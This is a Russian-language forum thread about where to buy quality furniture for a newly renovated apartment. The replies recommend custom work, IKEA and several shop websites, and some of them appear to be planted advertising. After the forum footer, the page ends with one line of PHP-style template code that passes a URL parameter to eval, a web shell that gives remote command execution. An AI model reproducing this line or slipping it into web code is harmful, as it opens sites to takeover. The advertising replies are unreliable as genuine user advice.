+ Ответить в теме
Показано с 1 по 7 из 7

Тема: Мебель в новую квартиру


  1. #1
    Мимо проходил Vadar is on a distinguished road Аватар для Vadar
    Регистрация
    01.12.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    0

    Мебель в новую квартиру

    Сейчас делаем ремонт в новой квартире и сразу подыскиваем туда нормальную мебель, но пока что-то не получается найти ничего стоящего - обошли все магазины, но нигде нет ничего подходящего. Может вы подскажете, где можно купить хорошую и желательно натуральную мебель?

  2. #2
    Мимо проходил Кузьмич is on a distinguished road Аватар для Кузьмич
    Регистрация
    30.11.2019
    Откуда
    Россия
    Машина
    Бричка
    Сообщений
    0
    В наших магазинах уже давно нет ничего хорошего, так что лучше подбирайте себе мебель на западных сайтах - там выбор гораздо больше, да и качество тоже.

  3. #3
    Мимо проходил Tanab is on a distinguished road Аватар для Tanab
    Регистрация
    04.12.2019
    Откуда
    Россия
    Машина
    Бричка
    Сообщений
    0
    Можно, конечно, попробовать подобрать мебель на западных сайтах, хотя, на самом деле, сейчас ведь даже не обязательно тащить ее из-за границы - например, на этом нашем сайте: http://eldomebel.ru/ можно без проблем заказать отличную мебель Правда по цене не сориентирую, но, думаю, это в любом случае выйдет дешевле, чем покупка за границей, особенно с учетом доставки.

  4. #4
    Мимо проходил Nevron is on a distinguished road Аватар для Nevron
    Регистрация
    26.01.2019
    Откуда
    Россия.
    Машина
    GOLF R
    Сообщений
    56
    По-моему у вас остается только один выход из этой ситуации, делайте мебель на заказ. Да, есть один минус, это то, что придется долго ждать, но зато вы сами сможете выбрать материал, и будете уже точно уверенны, что мебель качественная, а не из прессованных опилок.

  5. #5
    Мимо проходил Doper is on a distinguished road Аватар для Doper
    Регистрация
    27.12.2018
    Откуда
    Россия
    Машина
    Volkswagen
    Сообщений
    71
    Вы знаете, я сам в такой же ситуации, объездили с женой в Питере все мебельные магазины, но так и не смогли ничего приличного выбрать, даже ничего не понравилось. Зато цены меня удивили, продают ширпотреб, а цену за него заломили космическую. В общем, мы решили поискать мебель в интернете. На данный момент остановили свой выбор на мебельном салоне ROSSI, нас заинтересовала итальянская мебель марки Moltenic, пока выбираем https://gallery-rossi.ru/fabriki/sov...mebel/molteni/ .

  6. #6
    Мимо проходил Larik is on a distinguished road Аватар для Larik
    Регистрация
    04.01.2019
    Откуда
    Россия.
    Машина
    Golf 4
    Сообщений
    65
    В Икеи вы были? Просто я там на днях был, и мебели у них полно, на любой вкус. Даже есть эксклюзивная, правда, цена у нее недешевая, но зато смотрится просто шикарно. думаю, она стоит таких денег.

  7. #7
    Мимо проходил Masewrol is on a distinguished road Аватар для Masewrol
    Регистрация
    28.01.2019
    Откуда
    Россия
    Машина
    Gof 6
    Сообщений
    64
    Вы не думайте, что это только у вас такая проблема, нет, я сам в такой же ситуации. Оказывается, что сейчас тяжело найти качественную, и красивую мебель. Правда, на днях нашел на одном сайте итальянские кухни из массива, в принципе неплохие модели, кстати, здесь сами можете в этом убедиться, может, что понравится http://mebel-toros.ru/ . Я себе один гарнитур присмотрел, если больше ничего другого не понравится, то можно будет заказать.

+ Ответить в теме

Похожие темы

  1. Мебель
    от deen в разделе Реклама
    Ответов: 6
    Последнее сообщение: 03.04.2024, 01:46
  2. Мебель в квартиру
    от Иванченко в разделе Семья и дом
    Ответов: 9
    Последнее сообщение: 14.08.2019, 11:35
  3. Мебель в квартиру
    от Strong в разделе Семья и дом
    Ответов: 4
    Последнее сообщение: 21.05.2019, 10:29
  4. Мебель
    от Bimbom в разделе Семья и дом
    Ответов: 6
    Последнее сообщение: 17.03.2019, 20:54
  5. Мебель
    от nekrolog в разделе Курилка
    Ответов: 4
    Последнее сообщение: 03.02.2019, 18:07

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}